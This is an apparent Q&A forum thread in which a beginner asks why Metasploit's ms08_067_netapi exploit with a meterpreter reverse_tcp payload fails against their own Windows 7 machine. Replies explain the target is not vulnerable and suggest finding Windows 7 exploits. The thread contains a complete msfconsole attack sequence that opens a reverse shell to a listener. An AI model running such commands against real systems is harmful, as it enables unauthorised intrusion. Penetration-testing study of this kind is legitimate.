# Trouble with Metasploit framework (kali linux) [ms08_067_netapi]

Tags: windows, metasploit, kali-linux

I'm new to kali linux and just penetration testing in general. I'm having a bit of trouble with the metasploit framework in getting into my own pc. I've used [this tutorial](https://www.youtube.com/watch?v=XLaEqwFUFLU) and I get an error that says "Exploit aborted due to no-target", and yet i've provided a target. Below is a list of the commands i've used and the error.

```
    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set lhost 192.168.0.104
    lhost => 192.168.0.104

    msf exploit(ms08_067_netapi) > set rhost 192.168.0.105
    rhost => 192.168.0.105

    msf exploit(ms08_067_netapi) > set lport 4444
    lport => 4444

    msf exploit(ms08_067_netapi) > set rport 445
    rport => 445

    msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse TCP handler on 192.168.0.104:4444 
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
    [*] We could not detect the language pack, defaulting to English
    [-] Exploit aborted due to failure: no-target: No matching target
    [*] Exploit completed, but no session was created.
```

[update] here is the output of 'show options'

```
    Module options (exploit/windows/smb/ms08_067_netapi):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    192.168.0.105    yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


    Payload options (windows/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.0.104    yes       The listen address
       LPORT     4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Automatic Targeting
```

Comment: please provide the output of the "options" command. thanks

Comment: This looks like a programming problem and is maybe better asked on stackoverflow.

Answer (score 4):

Windows 7 SP1 should not be vulnerable to ms08_067. You can see which targets metasploit supports with the `show targets` command. This is the list I have on my kali box:

```
Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese - Brazilian (NX)
   68  Windows 2003 SP2 Spanish (NO NX)
   69  Windows 2003 SP2 Spanish (NX)
   70  Windows 2003 SP2 Japanese (NO NX)
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)
```

Answer (score 2):

Windows 7 is not vulnerable to this vulnerability as mentioned [here](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4250). This exploit only works on the targets mentioned in the code. Go through the exploit code,you can see only Windows 2003 and windows XP is mentioned.

Take a look at the snippet of code which returns the error message which is shown on your terminal.
You can see the code on github as well [Here](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms08_067_netapi.rb)

> print_status('Automatically detecting the target...')
>         fprint = smb_fingerprint
>
> ```
>   print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")
>
>   # Bail early on unknown OS
>   if (fprint['os'] == 'Unknown')
>     fail_with(Failure::NoTarget, 'No matching target')
>   end
> ```

Here you can see when it will return error message "No Matching target found", when the version of OS required to exploit this vulnerability is not detected.
So to exploit, the victim should be running Windows XP or Windows 2003.

Comment: Okay thanks for clarifying, but is there a way to use metasploit for windows 7?

Comment: You need to search for vulnerabilities which affects Windows 7. If you found one then check for the MSF exploit if available then exploit. Go through this link https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-17153/hasexp-1/Microsoft-Windows-7.html. You can also check for IE vulnerability.